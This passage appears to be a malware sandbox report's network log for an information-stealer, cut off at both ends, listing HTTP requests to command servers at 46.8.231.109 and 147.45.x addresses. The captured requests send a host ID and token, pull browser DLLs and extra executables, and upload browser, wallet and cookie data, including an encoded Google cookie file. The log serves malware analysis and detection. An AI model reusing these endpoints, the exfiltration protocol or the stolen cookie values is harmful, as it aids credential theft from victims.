9b 83 3f c5 34 50 b4 4e 15 be 12 d8 38 33 22 8e fa 70 65 e1 da 6f 02 81 c2 63 b7 96 77 74 f5 bc 6a fa d0 4c a6 5f 4b b5 af ec 17 51 40 80 15 3b 73 05 e7 d1 08 11 3f 52 4b 96 16 47 4e 00 02 26 91 63 1d ad f4 93 0f 4e 05 dc e6 13 60 a3 70 d1 32 01 1c 2b 06 59 ad 8e 45 3

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /jamelwt HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /jamelwt HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=c502aee2533efa76c5_13289933752292435604
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 46.8.231.109Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEBAFBGIDHCBFHIECFCHost: 46.8.231.109Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 37 44 31 45 33 34 31 42 31 37 41 32 39 37 34 31 36 34 32 35 38 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 2d 2d 0d 0a Data Ascii: ------AAEBAFBGIDHCBFHIECFCContent-Disposition: form-data; name="hwid"07D1E341B17A2974164258------AAEBAFBGIDHCBFHIECFCContent-Disposition: form-data; name="build"default------AAEBAFBGIDHCBFHIECFC--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFIEHDHIIIECAAKECFHHost: 46.8.231.109Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 46 49 45 48 44 48 49 49 49 45 43 41 41 4b 45 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 33 33 33 39 64 63 34 65 64 33 32 31 39 64 30 32 34 38 62 63 66 34 63 64 38 61 66 64 65 32 65 39 35 66 39 35 62 62 37 66 64 31 39 65 32 30 30 38 66 62 38 33 65 36 31 30 30 61 33 62 32 63 39 38 61 32 61 66 64 30 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 49 45 48 44 48 49 49 49 45 43 41 41 4b 45 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 49 45 48 44 48 49 49 49 45 43 41 41 4b 45 43 46 48 2d 2d 0d 0a Data Ascii: ------DBFIEHDHIIIECAAKECFHContent-Disposition: form-data; name="token"813339dc4ed3219d0248bcf4cd8afde2e95f95bb7fd19e2008fb83e6100a3b2c98a2afd0------DBFIEHDHIIIECAAKECFHContent-Disposition: form-data; name="message"browsers------DBFIEHDHIIIECAAKECFH--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKJDGDHIDBGIECBGHJDBHost: 46.8.231.109Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 33 33 33 39 64 63 34 65 64 33 32 31 39 64 30 32 34 38 62 63 66 34 63 64 38 61 66 64 65 32 65 39 35 66 39 35 62 62 37 66 64 31 39 65 32 30 30 38 66 62 38 33 65 36 31 30 30 61 33 62 32 63 39 38 61 32 61 66 64 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 2d 2d 0d 0a Data Ascii: ------KKJDGDHIDBGIECBGHJDBContent-Disposition: form-data; name="token"813339dc4ed3219d0248bcf4cd8afde2e95f95bb7fd19e2008fb83e6100a3b2c98a2afd0------KKJDGDHIDBGIECBGHJDBContent-Disposition: form-data; name="message"plugins------KKJDGDHIDBGIECBGHJDB--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJKKKFCFHCFIECBGDHIHost: 46.8.231.109Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 33 33 33 39 64 63 34 65 64 33 32 31 39 64 30 32 34 38 62 63 66 34 63 64 38 61 66 64 65 32 65 39 35 66 39 35 62 62 37 66 64 31 39 65 32 30 30 38 66 62 38 33 65 36 31 30 30 61 33 62 32 63 39 38 61 32 61 66 64 30 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 2d 2d 0d 0a Data Ascii: ------GIJKKKFCFHCFIECBGDHIContent-Disposition: form-data; name="token"813339dc4ed3219d0248bcf4cd8afde2e95f95bb7fd19e2008fb83e6100a3b2c98a2afd0------GIJKKKFCFHCFIECBGDHIContent-Disposition: form-data; name="message"fplugins------GIJKKKFCFHCFIECBGDHI--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBGIIDBKEBFBGCAEBAKHost: 46.8.231.109Content-Length: 8339Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFIEHDHIIIECAAKECFHHost: 46.8.231.109Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 46 49 45 48 44 48 49 49 49 45 43 41 41 4b 45 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 33 33 33 39 64 63 34 65 64 33 32 31 39 64 30 32 34 38 62 63 66 34 63 64 38 61 66 64 65 32 65 39 35 66 39 35 62 62 37 66 64 31 39 65 32 30 30 38 66 62 38 33 65 36 31 30 30 61 33 62 32 63 39 38 61 32 61 66 64 30 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 49 45 48 44 48 49 49 49 45 43 41 41 4b 45 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 49 45 48 44 48 49 49 49 45 43 41 41 4b 45 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4e 7a 59 31 4e 44 45 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 55 74 4d 44 63 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 31 4e 7a 51 77 43 55 35 4a 52 41 6b 31 4d 54 45 39 62 6b 35 68 5a 48 46 58 4f 58 56 55 59 31 6b 77 54 31 41 32 53 54 4e 68 5a 6d 35 79 4e 7a 46 76 4e 6b 56 36 59 56 6c 4d 63 32 52 77 56 7a 52 56 52 56 6c 4f 4d 33 5a 5a 63 56 39 79 59 6c 4a 79 54 6b 5a 34 54 54 46 71 62 33 70 51 52 33 56 6f 61 6b 39 53 51 6c 70 4c 53 30 31 36 4d 6e 52 6b 52 48 42 57 5a 54 64 6b 54 6e 56 55 56 33 41 30 51 33 6c 4c 4c 58 70 30 4e 55 6c 7a 4e 6e 64 57 52 57 78 32 5a 56 64 42 5a 6b 74 52 5a 33 64 4f 53 6d 6c 4c 53 33 52 59 53 45 4e 44 51 32 31 79 62 47 64 36 57 6c 52 73 4e 55 4e 70 53 32 70 55 5a 55 45 79 61 56 46 78 5a 6a 5a 36 62 46 4a 4c 4d 6d 67 34 64 32 63 78 61 46 5a 77 53 58 4e 58 63 32 46 4c 63 57 46 58 53 6e 6c 49 54 56 42 47 4d 30 70 42 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 49 45 48 44 48 49 49 49 45 43 41 41 4b 45 43 46 48 2d 2d 0d 0a Data Ascii: ------DBFIEHDHIIIECAAKECFHContent-Disposition: form-data; name="token"813339dc4ed3219d0248bcf4cd8afde2e95f95bb7fd19e2008fb83e6100a3b2c98a2afd0------DBFIEHDHIIIECAAKECFHContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------DBFIEHDHIIIECAAKECFHContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwNzY1NDEJMVBfSkFSCTIwMjMtMTAtMDUtMDcKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjk1NzQwCU5JRAk1MTE9bk5hZHFXOXVUY1kwT1A2STNhZm5yNzFvNkV6YVl
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBGCBKFBGIIIECAAAKFCHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 47 43 42 4b 46 42 47 49 49 49 45 43 41 41 41 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 33 33 33 39 64 63 34 65 64 33 32 31 39 64 30 32 34 38 62 63 66 34 63 64 38 61 66 64 65 32 65 39 35 66 39 35 62 62 37 66 64 31 39 65 32 30 30 38 66 62 38 33 65 36 31 30 30 61 33 62 32 63 39 38 61 32 61 66 64 30 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 42 4b 46 42 47 49 49 49 45 43 41 41 41 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 42 4b 46 42 47 49 49 49 45 43 41 41 41 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 42 4b 46 42 47 49 49 49 45 43 41 41 41 4b 46 43 2d 2d 0d 0a Data Ascii: ------CBGCBKFBGIIIECAAAKFCContent-Disposition: form-data; name="token"813339dc4ed3219d0248bcf4cd8afde2e95f95bb7fd19e2008fb83e6100a3b2c98a2afd0------CBGCBKFBGIIIECAAAKFCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CBGCBKFBGIIIECAAAKFCContent-Disposition: form-data; name="file"------CBGCBKFBGIIIECAAAKFC--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGCFHIDAKECFHIEBFCGIHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 33 33 33 39 64 63 34 65 64 33 32 31 39 64 30 32 34 38 62 63 66 34 63 64 38 61 66 64 65 32 65 39 35 66 39 35 62 62 37 66 64 31 39 65 32 30 30 38 66 62 38 33 65 36 31 30 30 61 33 62 32 63 39 38 61 32 61 66 64 30 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 49 2d 2d 0d 0a Data Ascii: ------DGCFHIDAKECFHIEBFCGIContent-Disposition: form-data; name="token"813339dc4ed3219d0248bcf4cd8afde2e95f95bb7fd19e2008fb83e6100a3b2c98a2afd0------DGCFHIDAKECFHIEBFCGIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------DGCFHIDAKECFHIEBFCGIContent-Disposition: form-data; name="file"------DGCFHIDAKECFHIEBFCGI--
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/mozglue.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/nss3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/vcruntime140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIDHIEBAAKJDHIECAAFHHost: 46.8.231.109Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDBFIIECBGDGDGDHCAKHost: 46.8.231.109Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 44 42 46 49 49 45 43 42 47 44 47 44 47 44 48 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 33 33 33 39 64 63 34 65 64 33 32 31 39 64 30 32 34 38 62 63 66 34 63 64 38 61 66 64 65 32 65 39 35 66 39 35 62 62 37 66 64 31 39 65 32 30 30 38 66 62 38 33 65 36 31 30 30 61 33 62 32 63 39 38 61 32 61 66 64 30 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 42 46 49 49 45 43 42 47 44 47 44 47 44 48 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 42 46 49 49 45 43 42 47 44 47 44 47 44 48 43 41 4b 2d 2d 0d 0a Data Ascii: ------EGDBFIIECBGDGDGDHCAKContent-Disposition: form-data; name="token"813339dc4ed3219d0248bcf4cd8afde2e95f95bb7fd19e2008fb83e6100a3b2c98a2afd0------EGDBFIIECBGDGDGDHCAKContent-Disposition: form-data; name="message"wallets------EGDBFIIECBGDGDGDHCAK--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGCGHCGHCBFHJJKKJEHHost: 46.8.231.109Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 33 33 33 39 64 63 34 65 64 33 32 31 39 64 30 32 34 38 62 63 66 34 63 64 38 61 66 64 65 32 65 39 35 66 39 35 62 62 37 66 64 31 39 65 32 30 30 38 66 62 38 33 65 36 31 30 30 61 33 62 32 63 39 38 61 32 61 66 64 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 48 2d 2d 0d 0a Data Ascii: ------JDGCGHCGHCBFHJJKKJEHContent-Disposition: form-data; name="token"813339dc4ed3219d0248bcf4cd8afde2e95f95bb7fd19e2008fb83e6100a3b2c98a2afd0------JDGCGHCGHCBFHJJKKJEHContent-Disposition: form-data; name="message"files------JDGCGHCGHCBFHJJKKJEH--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFCFHJDBKJKEBFHJEHIHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 33 33 33 39 64 63 34 65 64 33 32 31 39 64 30 32 34 38 62 63 66 34 63 64 38 61 66 64 65 32 65 39 35 66 39 35 62 62 37 66 64 31 39 65 32 30 30 38 66 62 38 33 65 36 31 30 30 61 33 62 32 63 39 38 61 32 61 66 64 30 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 2d 2d 0d 0a Data Ascii: ------HCFCFHJDBKJKEBFHJEHIContent-Disposition: form-data; name="token"813339dc4ed3219d0248bcf4cd8afde2e95f95bb7fd19e2008fb83e6100a3b2c98a2afd0------HCFCFHJDBKJKEBFHJEHIContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------HCFCFHJDBKJKEBFHJEHIContent-Disposition: form-data; name="file"------HCFCFHJDBKJKEBFHJEHI--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIIJJJKEGIDGCBAFIJHost: 46.8.231.109Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 33 33 33 39 64 63 34 65 64 33 32 31 39 64 30 32 34 38 62 63 66 34 63 64 38 61 66 64 65 32 65 39 35 66 39 35 62 62 37 66 64 31 39 65 32 30 30 38 66 62 38 33 65 36 31 30 30 61 33 62 32 63 39 38 61 32 61 66 64 30 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 2d 2d 0d 0a Data Ascii: ------IDHIIJJJKEGIDGCBAFIJContent-Disposition: form-data; name="token"813339dc4ed3219d0248bcf4cd8afde2e95f95bb7fd19e2008fb83e6100a3b2c98a2afd0------IDHIIJJJKEGIDGCBAFIJContent-Disposition: form-data; name="message"ybncbhylepme------IDHIIJJJKEGIDGCBAFIJ--
Source: global traffic	HTTP traffic detected: GET /prog/66cf818156193_ldjfnsfd.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66cf75d3791d7_vrewqgq.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJJDBAEHIJKJKEBFIEGHHost: 46.8.231.109Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4a 44 42 41 45 48 49 4a 4b 4a 4b 45 42 46 49 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 33 33 33 39 64 63 34 65 64 33 32 31 39 64 30 32 34 38 62 63 66 34 63 64 38 61 66 64 65 32 65 39 35 66 39 35 62 62 37 66 64 31 39 65 32 30 30 38 66 62 38 33 65 36 31 30 30 61 33 62 32 63 39 38 61 32 61 66 64 30 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 44 42 41 45 48 49 4a 4b 4a 4b 45 42 46 49 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 44 42 41 45 48 49 4a 4b 4a 4b 45 42 46 49 45 47 48 2d 2d 0d 0a Data Ascii: ------IJJDBAEHIJKJKEBFIEGHContent-Disposition: form-data; name="token"813339dc4ed3219d0248bcf4cd8afde2e95f95bb7fd19e2008fb83e6100a3b2c98a2afd0------IJJDBAEHIJKJKEBFIEGHContent-Disposition: form-data; name="message"wkkjqaiaxkhb------IJJDBAEHIJKJKEBFIEGH--
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHDHIDAEHCFHJJJJECAHost: 147.45.68.138Content-Length: 256Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 37 44 31 45 33 34 31 42 31 37 41 32 39 37 34 31 36 34 32 35 38 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 